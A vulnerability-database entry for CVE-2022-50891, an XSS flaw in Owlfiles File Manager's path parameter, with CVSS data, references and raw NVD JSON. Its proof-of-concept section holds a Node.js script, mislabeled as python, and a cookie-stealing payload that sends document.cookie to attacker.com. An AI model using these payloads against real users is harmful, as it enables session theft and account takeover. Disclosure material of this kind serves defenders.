CVE-2022-50891

Description

Owlfiles File Manager 12.0.1 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the path parameter in HTTP server endpoints. Attackers can craft URLs targeting the download and list endpoints with embedded script tags to execute arbitrary JavaScript in users' browsers.

CVSS Details

CVSS Score

5.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:skyjos:owlfiles:12.0.1:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:ipados:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:apple:iphone_os:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:apple:tvos:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:apple:visionos:-:*:*:*:*:*:*:* - NOT VULNERABLE

Owlfiles File Manager < 12.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2022-50891 PoC - XSS via path parameter in Owlfiles File Manager
// Target: http://localhost:PORT/download?path=<script>alert('XSS')</script>
// Target: http://localhost:PORT/list?path=<img src=x onerror=alert(document.cookie)>

const http = require('http');

function exploitXSS(targetHost, targetPort, xssPayload) {
    const options = {
        hostname: targetHost,
        port: targetPort,
        path: '/download?path=' + encodeURIComponent(xssPayload),
        method: 'GET'
    };

    const req = http.request(options, (res) => {
        let data = '';
        res.on('data', (chunk) => { data += chunk; });
        res.on('end', () => {
            console.log('Response Status:', res.statusCode);
            console.log('XSS Payload reflected in response:', data.includes(xssPayload));
        });
    });

    req.on('error', (e) => {
        console.error('Request error:', e.message);
    });

    req.end();
}

// Cookie stealing payload
const cookieStealPayload = '<script>fetch("http://attacker.com/steal?c="+document.cookie)</script>';
exploitXSS('localhost', 8080, cookieStealPayload);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50891
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50891
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50891/
[4] VulDB https://vuldb.com/cve/CVE-2022-50891
[5] https://apps.apple.com/us/app/owlfiles-file-manager/id510282524
[6] https://www.exploit-db.com/exploits/51036
[7] https://www.skyjos.com/
[8] https://www.vulncheck.com/advisories/owlfiles-file-manager-cross-site-scripting-via-http-server
[9] https://www.exploit-db.com/exploits/51036

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50891", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:50.567", "lastModified": "2026-02-02T16:16:15.650", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Owlfiles File Manager 12.0.1 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the path parameter in HTTP server endpoints. Attackers can craft URLs targeting the download and list endpoints with embedded script tags to execute arbitrary JavaScript in users' browsers."}, {"lang": "es", "value": "Owlfiles File Manager 12.0.1 contiene una vulnerabilidad de cross-site scripting que permite a los atacantes inyectar scripts maliciosos a través del parámetro 'path' en los puntos finales del servidor HTTP. Los atacantes pueden crear URLs dirigidas a los puntos finales de descarga y lista con etiquetas de script incrustadas para ejecutar JavaScript arbitrario en los navegadores de los usuarios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:skyjos:owlfiles:12.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "1E81E20E-05BA-4886-8C8E-3BDE79306740"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:ipados:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8D54BB4-30FB-4886-B1DE-7316F11B674B"}, {"vulnerable": false, "criteria": "cpe:2.3:o:apple:iphone_os:-:*:*:*:*:*:*:*", "matchCriteriaId": "B5415705-33E5-46D5-8E4D-9EBADC8C5705"}, {"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:apple:tvos:-:*:*:*:*:*:*:*", "matchCriteriaId": "2346B2F8-C1F3-41C8-BD78-615FC31E9D0F"}, {"vulnerable": false, "criteria": "cpe:2.3:o:apple:visionos:-:*:*:*:*:*:*:*", "matchCriteriaId": "653A9908-981E-4C56-B557-F8F9838B31E1"}]}]}], "references": [{"url": "https://apps.apple.com/us/app/owlfiles-file-manager/id510282524", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51036", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.skyjos.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vu ... (truncated)